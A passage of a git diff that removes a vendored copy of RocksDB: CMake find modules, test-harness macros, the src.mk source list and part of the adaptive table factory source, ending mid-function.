++  #      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
++  #      )
++  #    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
++  #    if(NOT "${exename}" MATCHES "db_sanity_test")
++  #      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
++  #      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
++  #    endif()
++  #endforeach(sourcefile ${TEST_EXES})
+ 
+   # C executables must link to a shared object
+   set(C_TESTS db/c_test.c)
+@@ -920,8 +906,3 @@ if(WITH_TESTS)
+       add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
+   endforeach(sourcefile ${C_TEST_EXES})
+ endif()
+-
+-option(WITH_TOOLS "build with tools" ON)
+-if(WITH_TOOLS)
+-  add_subdirectory(tools)
+-endif()
+diff --git a/cmake/modules/FindJeMalloc.cmake b/cmake/modules/FindJeMalloc.cmake
+deleted file mode 100644
+index 7911f77c4..000000000
+--- a/cmake/modules/FindJeMalloc.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find JeMalloc library
+-# Find the native JeMalloc includes and library
+-#
+-# JEMALLOC_INCLUDE_DIR - where to find jemalloc.h, etc.
+-# JEMALLOC_LIBRARIES - List of libraries when using jemalloc.
+-# JEMALLOC_FOUND - True if jemalloc found.
+-
+-find_path(JEMALLOC_INCLUDE_DIR
+-  NAMES jemalloc/jemalloc.h
+-  HINTS ${JEMALLOC_ROOT_DIR}/include)
+-
+-find_library(JEMALLOC_LIBRARIES
+-  NAMES jemalloc
+-  HINTS ${JEMALLOC_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(jemalloc DEFAULT_MSG JEMALLOC_LIBRARIES JEMALLOC_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  JEMALLOC_LIBRARIES
+-  JEMALLOC_INCLUDE_DIR)
+diff --git a/cmake/modules/Findbzip2.cmake b/cmake/modules/Findbzip2.cmake
+deleted file mode 100644
+index 87abbe941..000000000
+--- a/cmake/modules/Findbzip2.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Bzip2
+-# Find the bzip2 compression library and includes
+-#
+-# BZIP2_INCLUDE_DIR - where to find bzlib.h, etc.
+-# BZIP2_LIBRARIES - List of libraries when using bzip2.
+-# BZIP2_FOUND - True if bzip2 found.
+-
+-find_path(BZIP2_INCLUDE_DIR
+-  NAMES bzlib.h
+-  HINTS ${BZIP2_ROOT_DIR}/include)
+-
+-find_library(BZIP2_LIBRARIES
+-  NAMES bz2
+-  HINTS ${BZIP2_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(bzip2 DEFAULT_MSG BZIP2_LIBRARIES BZIP2_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  BZIP2_LIBRARIES
+-  BZIP2_INCLUDE_DIR)
+diff --git a/cmake/modules/Findlz4.cmake b/cmake/modules/Findlz4.cmake
+deleted file mode 100644
+index c34acef5e..000000000
+--- a/cmake/modules/Findlz4.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Lz4
+-# Find the lz4 compression library and includes
+-#
+-# LZ4_INCLUDE_DIR - where to find lz4.h, etc.
+-# LZ4_LIBRARIES - List of libraries when using lz4.
+-# LZ4_FOUND - True if lz4 found.
+-
+-find_path(LZ4_INCLUDE_DIR
+-  NAMES lz4.h
+-  HINTS ${LZ4_ROOT_DIR}/include)
+-
+-find_library(LZ4_LIBRARIES
+-  NAMES lz4
+-  HINTS ${LZ4_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(lz4 DEFAULT_MSG LZ4_LIBRARIES LZ4_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  LZ4_LIBRARIES
+-  LZ4_INCLUDE_DIR)
+diff --git a/cmake/modules/Findsnappy.cmake b/cmake/modules/Findsnappy.cmake
+deleted file mode 100644
+index 6ed5fda3d..000000000
+--- a/cmake/modules/Findsnappy.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find Snappy
+-# Find the snappy compression library and includes
+-#
+-# SNAPPY_INCLUDE_DIR - where to find snappy.h, etc.
+-# SNAPPY_LIBRARIES - List of libraries when using snappy.
+-# SNAPPY_FOUND - True if snappy found.
+-
+-find_path(SNAPPY_INCLUDE_DIR
+-  NAMES snappy.h
+-  HINTS ${SNAPPY_ROOT_DIR}/include)
+-
+-find_library(SNAPPY_LIBRARIES
+-  NAMES snappy
+-  HINTS ${SNAPPY_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(snappy DEFAULT_MSG SNAPPY_LIBRARIES SNAPPY_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  SNAPPY_LIBRARIES
+-  SNAPPY_INCLUDE_DIR)
+diff --git a/cmake/modules/Findzlib.cmake b/cmake/modules/Findzlib.cmake
+deleted file mode 100644
+index fb5aee9b5..000000000
+--- a/cmake/modules/Findzlib.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find zlib
+-# Find the zlib compression library and includes
+-#
+-# ZLIB_INCLUDE_DIR - where to find zlib.h, etc.
+-# ZLIB_LIBRARIES - List of libraries when using zlib.
+-# ZLIB_FOUND - True if zlib found.
+-
+-find_path(ZLIB_INCLUDE_DIR
+-  NAMES zlib.h
+-  HINTS ${ZLIB_ROOT_DIR}/include)
+-
+-find_library(ZLIB_LIBRARIES
+-  NAMES z
+-  HINTS ${ZLIB_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(zlib DEFAULT_MSG ZLIB_LIBRARIES ZLIB_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  ZLIB_LIBRARIES
+-  ZLIB_INCLUDE_DIR)
+diff --git a/cmake/modules/Findzstd.cmake b/cmake/modules/Findzstd.cmake
+deleted file mode 100644
+index a2964aa9f..000000000
+--- a/cmake/modules/Findzstd.cmake
++++ /dev/null
+@@ -1,21 +0,0 @@
+-# - Find zstd
+-# Find the zstd compression library and includes
+-#
+-# ZSTD_INCLUDE_DIR - where to find zstd.h, etc.
+-# ZSTD_LIBRARIES - List of libraries when using zstd.
+-# ZSTD_FOUND - True if zstd found.
+-
+-find_path(ZSTD_INCLUDE_DIR
+-  NAMES zstd.h
+-  HINTS ${ZSTD_ROOT_DIR}/include)
+-
+-find_library(ZSTD_LIBRARIES
+-  NAMES zstd
+-  HINTS ${ZSTD_ROOT_DIR}/lib)
+-
+-include(FindPackageHandleStandardArgs)
+-find_package_handle_standard_args(zstd DEFAULT_MSG ZSTD_LIBRARIES ZSTD_INCLUDE_DIR)
+-
+-mark_as_advanced(
+-  ZSTD_LIBRARIES
+-  ZSTD_INCLUDE_DIR)
+diff --git a/util/testharness.cc b/util/testharness.cc
+index 7ec353762..4626ea085 100644
+--- a/util/testharness.cc
++++ b/util/testharness.cc
+@@ -13,14 +13,6 @@
+ namespace rocksdb {
+ namespace test {
+ 
+-::testing::AssertionResult AssertStatus(const char* s_expr, const Status& s) {
+-  if (s.ok()) {
+-    return ::testing::AssertionSuccess();
+-  } else {
+-    return ::testing::AssertionFailure() << s_expr << std::endl
+-                                         << s.ToString();
+-  }
+-}
+ 
+ std::string TmpDir(Env* env) {
+   std::string dir;
+diff --git a/util/testharness.h b/util/testharness.h
+index 8da568123..44ee76eb9 100644
+--- a/util/testharness.h
++++ b/util/testharness.h
+@@ -9,12 +9,6 @@
+ 
+ #pragma once
+ 
+-#ifdef OS_AIX
+-#include "gtest/gtest.h"
+-#else
+-#include <gtest/gtest.h>
+-#endif
+-
+ #include <string>
+ #include "rocksdb/env.h"
+ 
+@@ -29,12 +23,5 @@ std::string TmpDir(Env* env = Env::Default());
+ // runs may be able to vary the seed.
+ int RandomSeed();
+ 
+-::testing::AssertionResult AssertStatus(const char* s_expr, const Status& s);
+-
+-#define ASSERT_OK(s) ASSERT_PRED_FORMAT1(rocksdb::test::AssertStatus, s)
+-#define ASSERT_NOK(s) ASSERT_FALSE((s).ok())
+-#define EXPECT_OK(s) EXPECT_PRED_FORMAT1(rocksdb::test::AssertStatus, s)
+-#define EXPECT_NOK(s) EXPECT_FALSE((s).ok())
+-
+ }  // namespace test
+ }  // namespace rocksdb
+diff --git a/utilities/cassandra/format.h b/utilities/cassandra/format.h
+index d8f51df14..fad6df4c4 100644
+--- a/utilities/cassandra/format.h
++++ b/utilities/cassandra/format.h
+@@ -177,17 +177,6 @@ private:
+   Columns columns_;
+   int64_t last_modified_time_;
+ 
+-  FRIEND_TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired);
+-  FRIEND_TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones);
+-  FRIEND_TEST(RowValueMergeTest, Merge);
+-  FRIEND_TEST(RowValueMergeTest, MergeWithRowTombstone);
+-  FRIEND_TEST(CassandraFunctionalTest, SimpleMergeTest);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldConvertExpiredColumnsToTombstone);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn);
+-  FRIEND_TEST(
+-    CassandraFunctionalTest, CompactionShouldRemoveRowWhenAllColumnExpiredIfPurgeTtlIsOn);
+ };
+ 
+ } // namepsace cassandrda
diff --git a/thirdparty/rocksdb/src.mk b/thirdparty/rocksdb/src.mk
deleted file mode 100644
index 5bd5236..0000000
--- a/thirdparty/rocksdb/src.mk
+++ /dev/null
@@ -1,400 +0,0 @@
-# These are the sources from which librocksdb.a is built:
-LIB_SOURCES =                                                   \
-  cache/clock_cache.cc                                          \
-  cache/lru_cache.cc                                            \
-  cache/sharded_cache.cc                                        \
-  db/builder.cc                                                 \
-  db/c.cc                                                       \
-  db/column_family.cc                                           \
-  db/compacted_db_impl.cc                                       \
-  db/compaction.cc                                              \
-  db/compaction_iterator.cc                                     \
-  db/compaction_job.cc                                          \
-  db/compaction_picker.cc                                       \
-  db/compaction_picker_universal.cc                             \
-  db/convenience.cc                                             \
-  db/db_filesnapshot.cc                                         \
-  db/db_impl.cc                                                 \
-  db/db_impl_write.cc                                           \
-  db/db_impl_compaction_flush.cc                                \
-  db/db_impl_files.cc                                           \
-  db/db_impl_open.cc                                            \
-  db/db_impl_debug.cc                                           \
-  db/db_impl_experimental.cc                                    \
-  db/db_impl_readonly.cc                                        \
-  db/db_info_dumper.cc                                          \
-  db/db_iter.cc                                                 \
-  db/dbformat.cc                                                \
-  db/event_helpers.cc                                           \
-  db/experimental.cc                                            \
-  db/external_sst_file_ingestion_job.cc                         \
-  db/file_indexer.cc                                            \
-  db/flush_job.cc                                               \
-  db/flush_scheduler.cc                                         \
-  db/forward_iterator.cc                                        \
-  db/internal_stats.cc                                          \
-  db/log_reader.cc                                              \
-  db/log_writer.cc                                              \
-  db/malloc_stats.cc                                            \
-  db/managed_iterator.cc                                        \
-  db/memtable.cc                                                \
-  db/memtable_list.cc                                           \
-  db/merge_helper.cc                                            \
-  db/merge_operator.cc                                          \
-  db/range_del_aggregator.cc                                    \
-  db/repair.cc                                                  \
-  db/snapshot_impl.cc                                           \
-  db/table_cache.cc                                             \
-  db/table_properties_collector.cc                              \
-  db/transaction_log_impl.cc                                    \
-  db/version_builder.cc                                         \
-  db/version_edit.cc                                            \
-  db/version_set.cc                                             \
-  db/wal_manager.cc                                             \
-  db/write_batch.cc                                             \
-  db/write_batch_base.cc                                        \
-  db/write_controller.cc                                        \
-  db/write_thread.cc                                            \
-  env/env.cc                                                    \
-  env/env_chroot.cc                                             \
-  env/env_encryption.cc                                         \
-  env/env_hdfs.cc                                               \
-  env/env_posix.cc                                              \
-  env/io_posix.cc                                               \
-  env/mock_env.cc                                               \
-  memtable/alloc_tracker.cc                                     \
-  memtable/hash_cuckoo_rep.cc                                   \
-  memtable/hash_linklist_rep.cc                                 \
-  memtable/hash_skiplist_rep.cc                                 \
-  memtable/skiplistrep.cc                                       \
-  memtable/vectorrep.cc                                         \
-  memtable/write_buffer_manager.cc                              \
-  monitoring/histogram.cc                                       \
-  monitoring/histogram_windowing.cc                             \
-  monitoring/instrumented_mutex.cc                              \
-  monitoring/iostats_context.cc                                 \
-  monitoring/perf_context.cc                                    \
-  monitoring/perf_level.cc                                      \
-  monitoring/statistics.cc                                      \
-  monitoring/thread_status_impl.cc                              \
-  monitoring/thread_status_updater.cc                           \
-  monitoring/thread_status_updater_debug.cc                     \
-  monitoring/thread_status_util.cc                              \
-  monitoring/thread_status_util_debug.cc                        \
-  options/cf_options.cc                                         \
-  options/db_options.cc                                         \
-  options/options.cc                                            \
-  options/options_helper.cc                                     \
-  options/options_parser.cc                                     \
-  options/options_sanity_check.cc                               \
-  port/port_posix.cc                                            \
-  port/stack_trace.cc                                           \
-  table/adaptive_table_factory.cc                               \
-  table/block.cc                                                \
-  table/block_based_filter_block.cc                             \
-  table/block_based_table_builder.cc                            \
-  table/block_based_table_factory.cc                            \
-  table/block_based_table_reader.cc                             \
-  table/block_builder.cc                                        \
-  table/block_prefix_index.cc                                   \
-  table/bloom_block.cc                                          \
-  table/cuckoo_table_builder.cc                                 \
-  table/cuckoo_table_factory.cc                                 \
-  table/cuckoo_table_reader.cc                                  \
-  table/flush_block_policy.cc                                   \
-  table/format.cc                                               \
-  table/full_filter_block.cc                                    \
-  table/get_context.cc                                          \
-  table/index_builder.cc                                        \
-  table/iterator.cc                                             \
-  table/merging_iterator.cc                                     \
-  table/meta_blocks.cc                                          \
-  table/partitioned_filter_block.cc                             \
-  table/persistent_cache_helper.cc                              \
-  table/plain_table_builder.cc                                  \
-  table/plain_table_factory.cc                                  \
-  table/plain_table_index.cc                                    \
-  table/plain_table_key_coding.cc                               \
-  table/plain_table_reader.cc                                   \
-  table/sst_file_writer.cc                                      \
-  table/table_properties.cc                                     \
-  table/two_level_iterator.cc                                   \
-  tools/dump/db_dump_tool.cc                                    \
-  util/arena.cc                                                 \
-  util/auto_roll_logger.cc                                      \
-  util/bloom.cc                                                 \
-  util/build_version.cc                                         \
-  util/coding.cc                                                \
-  util/compaction_job_stats_impl.cc                             \
-  util/comparator.cc                                            \
-  util/concurrent_arena.cc                                      \
-  util/crc32c.cc                                                \
-  util/delete_scheduler.cc                                      \
-  util/dynamic_bloom.cc                                         \
-  util/event_logger.cc                                          \
-  util/file_reader_writer.cc                                    \
-  util/file_util.cc                                             \
-  util/filename.cc                                              \
-  util/filter_policy.cc                                         \
-  util/hash.cc                                                  \
-  util/log_buffer.cc                                            \
-  util/murmurhash.cc                                            \
-  util/random.cc                                                \
-  util/rate_limiter.cc                                          \
-  util/slice.cc                                                 \
-  util/sst_file_manager_impl.cc                                 \
-  util/status.cc                                                \
-  util/status_message.cc                                        \
-  util/string_util.cc                                           \
-  util/sync_point.cc                                            \
-  util/thread_local.cc                                          \
-  util/threadpool_imp.cc                                        \
-  util/transaction_test_util.cc                                 \
-  util/xxhash.cc                                                \
-  utilities/backupable/backupable_db.cc                         \
-  utilities/blob_db/blob_db.cc                                  \
-  utilities/blob_db/blob_db_impl.cc                             \
-  utilities/blob_db/blob_file.cc                                \
-  utilities/blob_db/blob_log_reader.cc                          \
-  utilities/blob_db/blob_log_writer.cc                          \
-  utilities/blob_db/blob_log_format.cc                          \
-  utilities/blob_db/ttl_extractor.cc                            \
-  utilities/cassandra/cassandra_compaction_filter.cc            \
-  utilities/cassandra/format.cc                                 \
-  utilities/cassandra/merge_operator.cc                         \
-  utilities/checkpoint/checkpoint_impl.cc                       \
-  utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc    \
-  utilities/convenience/info_log_finder.cc                      \
-  utilities/date_tiered/date_tiered_db_impl.cc                  \
-  utilities/debug.cc                                        	\
-  utilities/document/document_db.cc                             \
-  utilities/document/json_document.cc                           \
-  utilities/document/json_document_builder.cc                   \
-  utilities/env_mirror.cc                                       \
-  utilities/env_timed.cc                                        \
-  utilities/geodb/geodb_impl.cc                                 \
-  utilities/leveldb_options/leveldb_options.cc                  \
-  utilities/lua/rocks_lua_compaction_filter.cc                  \
-  utilities/memory/memory_util.cc                               \
-  utilities/merge_operators/max.cc                              \
-  utilities/merge_operators/put.cc                              \
-  utilities/merge_operators/string_append/stringappend.cc       \
-  utilities/merge_operators/string_append/stringappend2.cc      \
-  utilities/merge_operators/uint64add.cc                        \
-  utilities/option_change_migration/option_change_migration.cc  \
-  utilities/options/options_util.cc                             \
-  utilities/persistent_cache/block_cache_tier.cc                \
-  utilities/persistent_cache/block_cache_tier_file.cc           \
-  utilities/persistent_cache/block_cache_tier_metadata.cc       \
-  utilities/persistent_cache/persistent_cache_tier.cc           \
-  utilities/persistent_cache/volatile_tier_impl.cc              \
-  utilities/redis/redis_lists.cc                                \
-  utilities/simulator_cache/sim_cache.cc                        \
-  utilities/spatialdb/spatial_db.cc                             \
-  utilities/table_properties_collectors/compact_on_deletion_collector.cc \
-  utilities/transactions/optimistic_transaction_db_impl.cc      \
-  utilities/transactions/optimistic_transaction.cc         \
-  utilities/transactions/transaction_base.cc                    \
-  utilities/transactions/pessimistic_transaction_db.cc                 \
-  utilities/transactions/transaction_db_mutex_impl.cc           \
-  utilities/transactions/pessimistic_transaction.cc                    \
-  utilities/transactions/transaction_lock_mgr.cc                \
-  utilities/transactions/transaction_util.cc                    \
-  utilities/transactions/write_prepared_txn.cc     \
-  utilities/ttl/db_ttl_impl.cc                                  \
-  utilities/write_batch_with_index/write_batch_with_index.cc    \
-  utilities/write_batch_with_index/write_batch_with_index_internal.cc    \
-
-TOOL_LIB_SOURCES = \
-  tools/ldb_cmd.cc                                               \
-  tools/ldb_tool.cc                                              \
-  tools/sst_dump_tool.cc                                         \
-  utilities/blob_db/blob_dump_tool.cc                            \
-
-MOCK_LIB_SOURCES = \
-  table/mock_table.cc \
-  util/fault_injection_test_env.cc
-
-BENCH_LIB_SOURCES = \
-  tools/db_bench_tool.cc                                        \
-
-EXP_LIB_SOURCES = \
-  utilities/col_buf_encoder.cc                                          \
-  utilities/col_buf_decoder.cc                                          \
-  utilities/column_aware_encoding_util.cc
-
-TEST_LIB_SOURCES = \
-  util/testharness.cc                                                   \
-  util/testutil.cc                                                      \
-  db/db_test_util.cc                                                    \
-  utilities/cassandra/test_utils.cc                                     \
-
-MAIN_SOURCES =                                                    \
-  cache/cache_bench.cc                                                   \
-  cache/cache_test.cc                                                    \
-  db/column_family_test.cc                                              \
-  db/compaction_job_stats_test.cc                                       \
-  db/compaction_job_test.cc                                             \
-  db/compaction_picker_test.cc                                          \
-  db/comparator_db_test.cc                                              \
-  db/corruption_test.cc                                                 \
-  db/cuckoo_table_db_test.cc                                            \
-  db/db_basic_test.cc                                                   \
-  db/db_block_cache_test.cc                                             \
-  db/db_bloom_filter_test.cc                                            \
-  db/db_compaction_filter_test.cc                                       \
-  db/db_compaction_test.cc                                              \
-  db/db_dynamic_level_test.cc                                           \
-  db/db_encryption_test.cc                                              \
-  db/db_flush_test.cc                                                    \
-  db/db_inplace_update_test.cc                                          \
-  db/db_io_failure_test.cc                                              \
-  db/db_iter_test.cc                                                    \
-  db/db_iterator_test.cc                                                \
-  db/db_log_iter_test.cc                                                \
-  db/db_memtable_test.cc                                                \
-  db/db_merge_operator_test.cc                                          \
-  db/db_options_test.cc                                                 \
-  db/db_range_del_test.cc                                               \
-  db/db_sst_test.cc                                                     \
-  db/db_statistics_test.cc                                              \
-  db/db_table_properties_test.cc                                        \
-  db/db_tailing_iter_test.cc                                            \
-  db/db_test.cc                                                         \
-  db/db_universal_compaction_test.cc                                    \
-  db/db_wal_test.cc                                                     \
-  db/db_write_test.cc                                                   \
-  db/dbformat_test.cc                                                   \
-  db/deletefile_test.cc                                                 \
-  db/external_sst_file_basic_test.cc                                    \
-  db/external_sst_file_test.cc                                          \
-  db/fault_injection_test.cc                                            \
-  db/file_indexer_test.cc                                               \
-  db/filename_test.cc                                                   \
-  db/flush_job_test.cc                                                  \
-  db/listener_test.cc                                                   \
-  db/log_test.cc                                                        \
-  db/manual_compaction_test.cc                                          \
-  db/merge_test.cc                                                      \
-  db/options_file_test.cc                                               \
-  db/perf_context_test.cc                                               \
-  db/plain_table_db_test.cc                                             \
-  db/prefix_test.cc                                                     \
-  db/table_properties_collector_test.cc                                 \
-  db/version_builder_test.cc                                            \
-  db/version_edit_test.cc                                               \
-  db/version_set_test.cc                                                \
-  db/wal_manager_test.cc                                                \
-  db/write_batch_test.cc                                                \
-  db/write_callback_test.cc                                             \
-  db/write_controller_test.cc                                           \
-  env/env_basic_test.cc                                                 \
-  env/env_test.cc                                                       \
-  env/mock_env_test.cc                                                  \
-  memtable/inlineskiplist_test.cc                                       \
-  memtable/memtablerep_bench.cc                                         \
-  memtable/skiplist_test.cc                                             \
-  memtable/write_buffer_manager_test.cc                                 \
-  monitoring/histogram_test.cc                                          \
-  monitoring/iostats_context_test.cc                                    \
-  monitoring/statistics_test.cc                                         \
-  options/options_test.cc                                               \
-  table/block_based_filter_block_test.cc                                \
-  table/block_test.cc                                                   \
-  table/cleanable_test.cc                                               \
-  table/cuckoo_table_builder_test.cc                                    \
-  table/cuckoo_table_reader_test.cc                                     \
-  table/full_filter_block_test.cc                                       \
-  table/merger_test.cc                                                  \
-  table/table_reader_bench.cc                                           \
-  table/table_test.cc                                                   \
-  third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc                  \
-  tools/db_bench.cc                                                     \
-  tools/db_bench_tool_test.cc                                           \
-  tools/db_sanity_test.cc                                               \
-  tools/ldb_cmd_test.cc                                                 \
-  tools/reduce_levels_test.cc                                           \
-  tools/sst_dump_test.cc                                                \
-  util/arena_test.cc                                                    \
-  util/auto_roll_logger_test.cc                                         \
-  util/autovector_test.cc                                               \
-  util/bloom_test.cc                                                    \
-  util/coding_test.cc                                                   \
-  util/crc32c_test.cc                                                   \
-  util/dynamic_bloom_test.cc                                            \
-  util/event_logger_test.cc                                             \
-  util/filelock_test.cc                                                 \
-  util/log_write_bench.cc                                               \
-  util/rate_limiter_test.cc                                             \
-  util/slice_transform_test.cc                                          \
-  util/timer_queue_test.cc                                              \
-  util/thread_list_test.cc                                              \
-  util/thread_local_test.cc                                             \
-  utilities/backupable/backupable_db_test.cc                            \
-  utilities/blob_db/blob_db_test.cc                                     \
-  utilities/cassandra/cassandra_format_test.cc                          \
-  utilities/cassandra/cassandra_functional_test.cc                      \
-  utilities/cassandra/cassandra_row_merge_test.cc                       \
-  utilities/cassandra/cassandra_serialize_test.cc                       \
-  utilities/checkpoint/checkpoint_test.cc                               \
-  utilities/column_aware_encoding_exp.cc                                \
-  utilities/column_aware_encoding_test.cc                               \
-  utilities/date_tiered/date_tiered_test.cc                             \
-  utilities/document/document_db_test.cc                                \
-  utilities/document/json_document_test.cc                              \
-  utilities/geodb/geodb_test.cc                                         \
-  utilities/lua/rocks_lua_test.cc                                       \
-  utilities/memory/memory_test.cc                                       \
-  utilities/merge_operators/string_append/stringappend_test.cc          \
-  utilities/object_registry_test.cc                                     \
-  utilities/option_change_migration/option_change_migration_test.cc     \
-  utilities/options/options_util_test.cc                                \
-  utilities/redis/redis_lists_test.cc                                   \
-  utilities/simulator_cache/sim_cache_test.cc                           \
-  utilities/spatialdb/spatial_db_test.cc                                \
-  utilities/table_properties_collectors/compact_on_deletion_collector_test.cc  \
-  utilities/transactions/optimistic_transaction_test.cc                 \
-  utilities/transactions/transaction_test.cc                            \
-  utilities/ttl/ttl_test.cc                                             \
-  utilities/write_batch_with_index/write_batch_with_index_test.cc       \
-
-JNI_NATIVE_SOURCES =                                          \
-  java/rocksjni/backupenginejni.cc                            \
-  java/rocksjni/backupablejni.cc                              \
-  java/rocksjni/checkpoint.cc                                 \
-  java/rocksjni/clock_cache.cc                                \
-  java/rocksjni/columnfamilyhandle.cc                         \
-  java/rocksjni/compaction_filter.cc                          \
-  java/rocksjni/compaction_options_fifo.cc                    \
-  java/rocksjni/compaction_options_universal.cc               \
-  java/rocksjni/comparator.cc                                 \
-  java/rocksjni/comparatorjnicallback.cc                      \
-  java/rocksjni/compression_options.cc                        \
-  java/rocksjni/env.cc                                        \
-  java/rocksjni/env_options.cc                                \
-  java/rocksjni/ingest_external_file_options.cc               \
-  java/rocksjni/filter.cc                                     \
-  java/rocksjni/iterator.cc                                   \
-  java/rocksjni/loggerjnicallback.cc                          \
-  java/rocksjni/lru_cache.cc                                  \
-  java/rocksjni/memtablejni.cc                                \
-  java/rocksjni/merge_operator.cc                             \
-  java/rocksjni/options.cc                                    \
-  java/rocksjni/ratelimiterjni.cc                             \
-  java/rocksjni/remove_emptyvalue_compactionfilterjni.cc      \
-  java/rocksjni/cassandra_compactionfilterjni.cc              \
-  java/rocksjni/restorejni.cc                                 \
-  java/rocksjni/rocksjni.cc                                   \
-  java/rocksjni/rocksdb_exception_test.cc                     \
-  java/rocksjni/slice.cc                                      \
-  java/rocksjni/snapshot.cc                                   \
-  java/rocksjni/sst_file_writerjni.cc                         \
-  java/rocksjni/statistics.cc                                 \
-  java/rocksjni/statisticsjni.cc                              \
-  java/rocksjni/table.cc                                      \
-  java/rocksjni/transaction_log.cc                            \
-  java/rocksjni/ttl.cc                                        \
-  java/rocksjni/write_batch.cc                                \
-  java/rocksjni/writebatchhandlerjnicallback.cc               \
-  java/rocksjni/write_batch_test.cc                           \
-  java/rocksjni/write_batch_with_index.cc
diff --git a/thirdparty/rocksdb/table/adaptive_table_factory.cc b/thirdparty/rocksdb/table/adaptive_table_factory.cc
deleted file mode 100644
index 47069f8..0000000
--- a/thirdparty/rocksdb/table/adaptive_table_factory.cc
+++ /dev/null
@@ -1,123 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/adaptive_table_factory.h"
-
-#include "table/table_builder.h"
-#include "table/format.h"
-#include "port/port.h"
-
-namespace rocksdb {
-
-AdaptiveTableFactory::AdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write,
-    std::shared_ptr<TableFactory> block_based_table_factory,
-    std::shared_ptr<TableFactory> plain_table_factory,
-    std::shared_ptr<TableFactory> cuckoo_table_factory)
-    : table_factory_to_write_(table_factory_to_write),
-      block_based_table_factory_(block_based_table_factory),
-      plain_table_factory_(plain_table_factory),
-      cuckoo_table_factory_(cuckoo_table_factory) {
-  if (!plain_table_factory_) {
-    plain_table_factory_.reset(NewPlainTableFactory());
-  }
-  if (!block_based_table_factory_) {
-    block_based_table_factory_.reset(NewBlockBasedTableFactory());
-  }
-  if (!cuckoo_table_factory_) {
-    cuckoo_table_factory_.reset(NewCuckooTableFactory());
-  }
-  if (!table_factory_to_write_) {
-    table_factory_to_write_ = block_based_table_factory_;
-  }
-}
-
-extern const uint64_t kPlainTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kCuckooTableMagicNumber;
-
-Status AdaptiveTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  Footer footer;
-  auto s = ReadFooterFromFile(file.get(), nullptr /* prefetch_buffer */,
-                              file_size, &footer);
-  if (!s.ok()) {
-    return s;
-  }
-  if (footer.table_magic_number() == kPlainTableMagicNumber ||
-      footer.table_magic_number() == kLegacyPlainTableMagicNumber) {
-    return plain_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else if (footer.table_magic_number() == kBlockBasedTableMagicNumber ||
-      footer.table_magic_number() == kLegacyBlockBasedTableMagicNumber) {
-    return block_based_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else if (footer.table_magic_number() == kCuckooTableMagicNumber) {
-    return cuckoo_table_factory_->NewTableReader(
-        table_reader_options, std::move(file), file_size, table);
-  } else {
-    return Status::NotSupported("Unidentified table format");
-  }
-}
-
-TableBuilder* AdaptiveTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  return table_factory_to_write_->NewTableBuilder(table_builder_options,
-                                                  column_family_id, file);
-}
-
-std::string AdaptiveTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  if (table_factory_to_write_) {
-    snprintf(buffer, kBufferSize, "  write factory (%s) options:\n%s\n",
-             (table_factory_to_write_->Name() ? table_factory_to_write_->Name()
-                                              : ""),
-             table_factory_to_write_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (plain_table_factory_) {
-    snprintf(buffer, kBufferSize, "  %s options:\n%s\n",
-             plain_table_factory_->Name() ? plain_table_factory_->Name() : "",
-             plain_table_factory_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (block_based_table_factory_) {
-    snprintf(
-        buffer, kBufferSize, "  %s options:\n%s\n",
-        (block_based_table_factory_->Name() ? block_based_table_factory_->Name()
-                                            : ""),
-        block_based_table_factory_->GetPrintableTableOptions().c_str());
-    ret.append(buffer);
-  }
-  if (cuckoo_table_factory_) {
-    snprintf(buffer, kBufferSize, "  %s options:\n%s\n",
-             cuckoo_table_factory_->Name() ? cuckoo_table_factory_->Name() : "",
-             cuckoo_table_factory_->GetPrintableTableOptions().c_str());
